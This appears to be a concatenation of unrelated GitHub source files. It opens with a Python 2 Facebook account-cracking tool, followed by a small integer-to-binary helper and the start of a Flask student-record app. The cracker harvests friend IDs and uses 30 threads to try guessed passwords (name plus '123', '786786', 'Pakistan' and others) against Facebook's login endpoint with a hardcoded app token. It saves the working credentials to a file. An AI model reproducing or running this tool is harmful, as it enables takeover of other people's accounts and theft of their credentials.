print("\n\033[1;96m[!] \x1b[1;91mPassword/Email ghalat hai")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\x1b[1;91m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print"\033[1;91mYour Account is on Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\x1b[1;92mThere is no internet connection"
keluar()
os.system("clear")
print logo
print "\033[1;36;40m ╔═════════════════════════════════╗"
print "\033[1;36;40m ║\033[1;32;40m[*] Name\033[1;32;40m: "+nama+" \033[1;36;40m║"
print "\033[1;36;40m ║\033[1;34;40m[*] ID \033[1;34;40m: "+id+" \033[1;36;40m║"
print "\033[1;36;40m ║\033[1;34;40m[*] Subs\033[1;34;40m: "+sub+" \033[1;36;40m║"
print "\033[1;36;40m ╚═════════════════════════════════╝"
print " \033[1;32;40m[Type1] \033[1;33;40m‹•.•›Start♥Hacking"
print " \033[1;32;40m[type2] \033[1;33;40m‹•.•›Update"
print " \033[1;32;40m[type0] \033[1;33;40m‹•.•›Logout"
pilih()
def pilih():
unikers = raw_input("\n\033[1;31;40m>>> \033[1;35;40m")
if unikers =="":
print "\x1b[1;91mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="2":
os.system('clear')
print logo
print " \033[1;36;40m●══════════════════◄►══════════════════●\n"
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print " \033[1;97m-•◈•-\033[1;91m> \033[1;91m1.\x1b[1;95m>_<Clone Friend List."
print " \033[1;97m-•◈•-\033[1;91m> \033[1;91m2.\x1b[1;95m>_<Hack Public Accounts ."
print " \033[1;97m-•◈•-\033[1;91m> \033[1;91m0.\033[1;91m>_<Back"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;91m^.^Choose an Option>>> \033[1;95m")
if peak =="":
print "\x1b[1;91mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print "\033[1;97m•◈•══════•◈•\033[1;91mUsmanKhan\033[1;97m•◈•══════•◈•"
jalan('\033[1;91mGetting IDs \033[1;91m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
idt = raw_input("\033[1;95m[•◈•] \033[1;91mEnter ID\033[1;95m: \033[1;95m")
print "\033[1;92m•◈•══════••◈•\033[1;91mBlackTiger\033[1;95m•◈•══════••◈•"
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91mName\033[1;95m:\033[1;95m "+op["name"]
except KeyError:
print"\x1b[1;91mID Not Found!"
raw_input("\n\033[1;95m[\033[1;91mBack\033[1;95m]")
super()
print"\033[1;91mGetting IDs\033[1;97m..."
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="0":
menu()
else:
print "\x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;36;40m[✺] Total IDs : \033[1;94m"+str(len(id))
jalan('\033[1;34;40m[✺] Please Wait...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;32;40m[✺] Cloning\033[1;93m"+o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;94m ❈ \x1b[1;91mTo Stop Process Press CTRL+Z \033[1;94m ❈"
print " \033[1;92m●══════════════════◄►══════════════════●"
jalan(' \033[1;91mUsman start cloning Wait...')
print " \033[1;92m ●══════════════════◄►══════════════════●"
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass #Dev:UsmanKhan
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print '\x1b[1;94m[ ✓ ] \x1b[1;92mHack100%💉'
print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m ✯ \x1b[1;92m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m ✯ \x1b[1;92m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass1 + '\n'
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m ✯ \x1b[1;95m' + b ['name']
print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m ✯ \x1b[1;95m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass1 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print '\x1b[1;94m[ ✓ ] \x1b[1;92mHack100%💉'
print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m ✯ \x1b[1;92m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m ✯ \x1b[1;92m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass2 + '\n'
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m ✯ \x1b[1;95m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m ✯ \x1b[1;95m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass2 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['last_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print '\x1b[1;94m[ ✓ ] \x1b[1;92mHack100%💉'
print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m ✯ \x1b[1;92m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m ✯ \x1b[1;92m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass3 + '\n'
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m ✯ \x1b[1;95m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m ✯ \x1b[1;95m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass3 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = b['first_name'] + 'Usman'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print '\x1b[1;94m[ ✓ ] \x1b[1;92mHack100%💉'
print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m ✯ \x1b[1;92m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m ✯ \x1b[1;92m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass4 + '\n'
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m ✯ \x1b[1;95m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m ✯ \x1b[1;95m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass4 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = '786786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print '\x1b[1;94m[ ✓ ] \x1b[1;92mHack100%💉'
print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m ✯ \x1b[1;92m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m ✯ \x1b[1;92m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass5 + '\n'
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m ✯ \x1b[1;95m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m ✯ \x1b[1;95m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass5 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print '\x1b[1;94m[ ✓ ] \x1b[1;92mHack100%💉'
print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m ✯ \x1b[1;92m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m ✯ \x1b[1;92m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass6 + '\n'
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m ✯ \x1b[1;95m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m ✯ \x1b[1;95m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass6 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
pass7 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print '\x1b[1;94m[ ✓ ] \x1b[1;92mHack100%💉'
print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m ✯ \x1b[1;92m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m ✯ \x1b[1;92m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass7 + '\n'
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m ✯ \x1b[1;95m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m ✯ \x1b[1;95m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass7 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
else:
pass8 = b['last_name'] + '786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass8)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print '\x1b[1;94m[ ✓ ] \x1b[1;92mHack100%💉'
print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m ✯ \x1b[1;92m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m ✯ \x1b[1;92m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass8 + '\n'
oks.append(user+pass8)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m ✯ \x1b[1;95m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m ✯ \x1b[1;95m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass8 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass8+"\n")
cek.close()
cekpoint.append(user+pass8)
else:
pass9 = b['first_name'] + '786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass9)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print '\x1b[1;94m[ ✓ ] \x1b[1;92mHack100%💉'
print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m ✯ \x1b[1;92m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m ✯ \x1b[1;92m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass9 + '\n'
oks.append(user+pass9)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m ✯ \x1b[1;95m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m ✯ \x1b[1;95m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass9 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass9+"\n")
cek.close()
cekpoint.append(user+pass9)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;95m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•\033[1;91mUsmanKhan\033[1;95m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•"
print " \033[1;91m«---•◈•---Developed By Usman Khan--•◈•---»" #Dev:Usman
print '\033[1;93m✅Process Has Been Completed Press➡ Ctrl+Z.↩ Next Type (python2 Tiger.py)↩\033[1;97m....'
print"\033[1;91mTotal OK/\x1b[1;95mCP \033[1;93m: \033[1;91m"+str(len(oks))+"\033[1;93m/\033[1;96m"+str(len(cekpoint))
print """
____________¶¶¶1¶¶_________¶¶¶¶¶¶¶___________
_________¶¶¶111¶¶___________¶¶111¶¶¶¶________
______¶¶¶¶1111¶¶¶____________¶¶¶1111¶¶¶1_____
_____¶¶¶1111¶¶¶¶_____________¶¶¶¶11111¶¶¶____
___¶¶¶11¶1¶1¶¶¶¶___¶¶____¶¶__¶¶¶¶¶1¶1¶1¶¶¶1__
__¶¶¶11¶1¶11¶¶¶¶¶__¶¶¶¶¶¶¶¶__¶¶¶¶¶1¶1¶¶11¶¶1_
_¶¶¶11¶¶1¶11¶¶¶¶¶¶__¶¶¶¶¶¶_¶¶¶¶¶¶¶1¶¶1¶¶1¶¶¶_
¶¶¶¶1¶¶11¶¶1¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶1¶¶1¶¶¶1¶¶¶
¶¶¶11¶¶11¶¶1¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶1¶¶¶1¶¶¶1¶¶¶
¶¶¶1¶¶¶¶1¶¶¶1¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶11¶¶¶1¶¶¶11¶¶
_¶¶11¶¶¶1¶¶¶¶1¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶1¶¶¶1¶¶¶¶1¶¶¶
_¶¶¶1¶¶¶¶1¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶1¶¶¶¶1¶¶1
__¶¶1¶¶¶¶¶¶¶¶__¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶__¶¶¶¶¶¶¶¶1¶¶¶_
___¶¶1¶¶¶_¶¶_______¶¶¶¶¶¶¶¶______¶¶¶¶¶¶¶¶¶¶__
____¶¶¶¶____________¶¶¶¶¶¶___________¶¶¶¶____
______¶¶¶__________¶¶¶__¶¶¶__________¶¶______
_______¶¶¶_________¶______¶_________¶¶¶______
Checkpoint ID Open After 24 Hours
•\033[1;95m◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•.
: \033[1;91m ....Usman Khan....... \033[1;95m :
•\033[1;95m◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•.'
Facebook
\033[1;91m Shan Noor"""
raw_input("\n\033[1;95m[\033[1;91mBack\033[1;95m]")
menu()
if __name__ == '__main__':
login()
|
[
"noreply@github.com"
] |
Raheemboss0071.noreply@github.com
|
a6afa95b502e530d2d924043fbd73f7a2656adb5
|
7238007ee7618cac13258602900017897c960bf5
|
/toBinary.py
|
f046ab383b306a5550371e62ac2391c29f9a286c
|
[] |
no_license
|
xinwangmath/PlantedMotifSearch
|
e2e7a298122a43e73289a277abd3b905b5b30033
|
5688117a5b0c569fd40043a4cd37cf56cd69a113
|
refs/heads/master
| 2020-05-17T22:49:56.507813
| 2015-03-10T14:25:49
| 2015-03-10T14:25:49
| 31,961,910
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 344
|
py
|
def toBinary(a,n):
""" convert an integer n into a n-bit string of 0 and 1 representing the binary of a """
s = bin(a)[2:];
if len(s) < n:
s1 = '0'*(n-len(s));
s = s1 + s;
return s;
# end of function definition #
if __name__ == '__main__':
a = (int)(raw_input("please enter an integer"));
n = 10;
print toBinary(a, n);
|
[
"ziyuexw1@gmail.com"
] |
ziyuexw1@gmail.com
|
c19708c6bf36cf854558739141da8850d7987462
|
f5183c888d7335c52f956ee12bafe6be4e3473d0
|
/www/app.py
|
812b413cb39ef5984b4a98b94dcc94d0732ad589
|
[] |
no_license
|
ftong9224/awesome-python3-webapp
|
3e106f7930895708ff8d999c2ceea9771966e4cb
|
0ee669662fdcaf3fdcf9d88de354da02994d2bed
|
refs/heads/master
| 2021-09-02T09:12:43.156922
| 2018-01-01T09:31:18
| 2018-01-01T09:31:18
| 114,324,161
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,905
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 _*_
__author__ = 'Ftong Tong'
'''
async web application
'''
import logging;logging.basicConfig(level=logging.INFO)
import asyncio, os, json, time
from datetime import datetime
from aiohttp import web
from jinja2 import Environment, FileSystemLoader
from config import configs
import orm
from coroweb import add_routes, add_static
from handlers import cookie2user, COOKIE_NAME
def init_jinja2(app, **kw):
logging.info('init jinja2...')
options = dict(
autoescape = kw.get('autoescape', True),
block_start_string = kw.get('block_start_string', '{%'),
block_end_string = kw.get('block_end_string', '%}'),
variable_start_string = kw.get('variable_start_string', '{{'),
variable_end_string = kw.get('variable_end_string', '}}'),
auto_reload = kw.get('auto_reload', True)
)
path = kw.get('path', None)
if path is None:
path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates')
logging.info('set jinja2 template path: %s' % path)
env = Environment(loader = FileSystemLoader(path), **options)
filters = kw.get('filters', None)
if filters is not None:
for name, f in filters.items():
env.filters[name] = f
app['__templating__'] = env
@asyncio.coroutine
def logger_factory(app, handler):
@asyncio.coroutine
def logger(request):
logging.info('Request: %s %s' % (request.method, request.path))
# await asyncio.sleep(0.3)
return(yield from handler(request))
return logger
@asyncio.coroutine
def auth_factory(app, handler):
@asyncio.coroutine
def auth(request):
logging.info('check user: %s %s' % (request.method, request.path))
request.__user__ = None
cookie_str = request.cookies.get(COOKIE_NAME)
if cookie_str:
user = yield from cookie2user(cookie_str)
if user:
logging.info('set current user: %s' % user.email)
request.__user__ = user
if request.path.startswith('/manage/') and (request.__user__ is None or not request.__user__.admin):
return web.HTTPFound('/signin')
return (yield from handler(request))
return auth
@asyncio.coroutine
def data_factory(app, handler):
@asyncio.coroutine
def parse_data(request):
if request.method == 'POST':
if request.content_type.startswith('application/json'):
request.__data__ = yield from request.json()
logging.info('request json: %s' % str(request.__data__))
elif request.content_type.startswith('application/x-www-from-urlencoded'):
request.__data__ = yield from request.post()
logging.info('request from: %s' % str(request.__data__))
return (yield from handler(request))
return parse_data
@asyncio.coroutine
def response_factory(app, handler):
@asyncio.coroutine
def response(request):
logging.info('Response handler...')
r = yield from handler(request)
if isinstance(r, web.StreamResponse):
return r
if isinstance(r, bytes):
resp = web.Response(body = r)
resp.content_type = 'application/octet-stream'
return resp
if isinstance(r, str):
if r.startswith('redirect:'):
return web.HTTPFound(r[9:])
resp = web.Response(body = r.encode('utf-8'))
resp.content_type = 'text/html;charset=utf-8'
return resp
if isinstance(r, dict):
template = r.get('__template__')
if template is None:
resp = web.Response(body = json.dumps(r, ensure_ascii = False, default = lambda o:o.__dict__).encode('utf-8'))
resp.content_type = 'application/json;charset=utf-8'
return resp
else:
r['__user__'] = request.__user__
resp = web.Response(body = app['__templating__'].get_template(template).render(**r).encode('utf-8'))
resp.content_type = 'text/html;charset=utf-8'
return resp
if isinstance(r, int) and r >= 100 and r < 600:
return web.Response(r)
if isinstance(r, tuple) and len(r) == 2:
t, m = r
if isinstance(t, int) and t >= 100 and t < 600:
return web.Response(t, str(m))
#default:
resp = web.Response(body = str(r).encode('utf-8'))
resp.content_type = 'text/plain;charset=utf-8'
return resp
return response
def datetime_filter(t):
delta = int(time.time() - t)
if delta < 60:
return u'1分钟前'
if delta < 3600:
return u'%s分钟前' % (delta // 60)
if delta < 86400:
return u'%s小时前' % (delta // 3600)
if delta < 604800:
return u'%s天前' % (delta // 86400)
dt = datetime.fromtimestamp(t)
return u'%s年%s月%s日' % (dt.year, dt.month, dt.day)
@asyncio.coroutine
def init(loop):
yield from orm.create_pool(loop = loop, **configs.db)
app = web.Application(loop = loop, middlewares = [
logger_factory, auth_factory, response_factory
])
init_jinja2(app, filters = dict(datetime = datetime_filter))
add_routes(app, 'handlers')
add_static(app)
srv = yield from loop.create_server(app.make_handler(), '0.0.0.0', 9000)
logging.info('server started at http://106.14.214.217:9000...')
return srv
loop = asyncio.get_event_loop()
loop.run_until_complete(init(loop))
loop.run_forever()
|
[
"ftong@163.com"
] |
ftong@163.com
|
42ea67672912de1d7477f0b55d7adcd814a121da
|
9b2d0ccde021cec80b41a65b58ebbe1cf7ba864b
|
/app.py
|
c249e97a2535ec32e0e23798dc249af65e85d0fe
|
[
"MIT"
] |
permissive
|
kunleh/SRS
|
0110ae729cfa6e8a3bd7e3be4afa8b036b67baec
|
23081061300a0df04c933e9671cf5a05b5c2a6d1
|
refs/heads/master
| 2021-04-30T03:19:38.094087
| 2017-09-24T17:32:07
| 2017-09-24T17:32:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 46,448
|
py
|
'''
App: Student Record System
Stack: Python(Flask), SQLite, HTML, CSS(Bootstrap), Javascript(JQuery)
Author: Ahmed Noor
'''
### Imports
from flask import Flask, flash, redirect, render_template, request, session, url_for, jsonify, g
from flask_compress import Compress
import sqlalchemy
from cs50 import SQL
from passlib.hash import sha256_crypt
import operator
import uuid
from werkzeug import secure_filename
import os, sys
### CS50 wrapper for SQLAlchemy
class SQL(object):
"""Wrap SQLAlchemy to provide a simple SQL API."""
def __init__(self, url):
"""
Create instance of sqlalchemy.engine.Engine.
URL should be a string that indicates database dialect and connection arguments.
http://docs.sqlalchemy.org/en/latest/core/engines.html#sqlalchemy.create_engine
"""
try:
self.engine = sqlalchemy.create_engine(url)
except Exception as e:
raise RuntimeError(e)
def execute(self, text, *multiparams, **params):
"""
Execute a SQL statement.
"""
try:
# bind parameters before statement reaches database, so that bound parameters appear in exceptions
# http://docs.sqlalchemy.org/en/latest/core/sqlelement.html#sqlalchemy.sql.expression.text
# https://groups.google.com/forum/#!topic/sqlalchemy/FfLwKT1yQlg
# http://docs.sqlalchemy.org/en/latest/core/connections.html#sqlalchemy.engine.Engine.execute
# http://docs.sqlalchemy.org/en/latest/faq/sqlexpressions.html#how-do-i-render-sql-expressions-as-strings-possibly-with-bound-parameters-inlined
statement = sqlalchemy.text(text).bindparams(*multiparams, **params)
result = self.engine.execute(str(statement.compile(compile_kwargs={"literal_binds": True})))
# if SELECT (or INSERT with RETURNING), return result set as list of dict objects
if result.returns_rows:
rows = result.fetchall()
return [dict(row) for row in rows]
# if INSERT, return primary key value for a newly inserted row
elif result.lastrowid is not None:
return result.lastrowid
# if DELETE or UPDATE (or INSERT without RETURNING), return number of rows matched
else:
return result.rowcount
# if constraint violated, return None
except sqlalchemy.exc.IntegrityError:
return None
# else raise error
except Exception as e:
raise RuntimeError(e)
### configure flask
app = Flask(__name__)
Compress(app)
app.secret_key = uuid.uuid4().hex
app.config['ALLOWED_EXTENSIONS'] = set(['png', 'PNG', 'jpg', 'JPG', 'jpeg', 'JPEG', 'ico', 'ICO'])
### File type confirmation
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS']
### Convert string to int type possibility confirmation
def RepresentsInt(s):
try:
int(s)
return True
except ValueError:
return False
### configure root directory path relative to this file
